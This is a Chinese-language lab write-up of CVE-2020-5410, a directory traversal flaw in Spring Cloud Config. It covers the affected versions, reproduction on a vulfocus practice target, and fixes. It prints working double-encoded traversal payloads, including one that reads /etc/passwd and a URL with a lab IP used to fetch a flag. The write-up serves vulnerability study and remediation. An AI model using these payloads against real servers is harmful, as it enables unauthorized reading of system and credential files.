Spring 目录遍历 (CVE-2020-5410 )
所有文章,仅供安全研究与学习之用,后果自负!
Spring 目录遍历 (CVE-2020-5410 )
0x01 漏洞描述
Spring Cloud Config是美国威睿(VMware)公司的一套分布式系统的配置管理解决方案。该产品主要为分布式系统中的外部配置提供服务器和客户端支持。 Spring Cloud Config,2.2.3之前的2.2.x版本,2.1.9之前的2.1.x版本以及较旧的不受支持的版本允许应用程序通过spring-cloud-config-server模块提供任意配置文件。恶意用户或攻击者可以使用特制URL发送请求,这可能导致目录遍历攻击。
8888端口
0x02 影响范围
Spring Cloud Config,2.2.3之前的2.2.x版本,2.1.9之前的2.1.x版本
0x03 漏洞复现
vulfocus靶场
靶场首页
%252F 两次url解码为 /
payload:
/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F.. %252Ftmp%23foo/development
访问下面url获取flag
http://118.193.36.37:61078/…%252F…%252F…%252F…%252F…%252F…%252F…%252F…%252F…%252F…%252Ftmp%23foo/development
etc/passwd
/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23foo/development
0x04 漏洞修复
升级到 Spring Cloud Config 至2.2.3版本或2.1.9版本,并且将Spring-Cloud-Config-Server服务放置在内网中,同时使用Spring Security进行身份验证。最新版本下载地址为:https://github.com/spring-cloud/spring-cloud-config/releases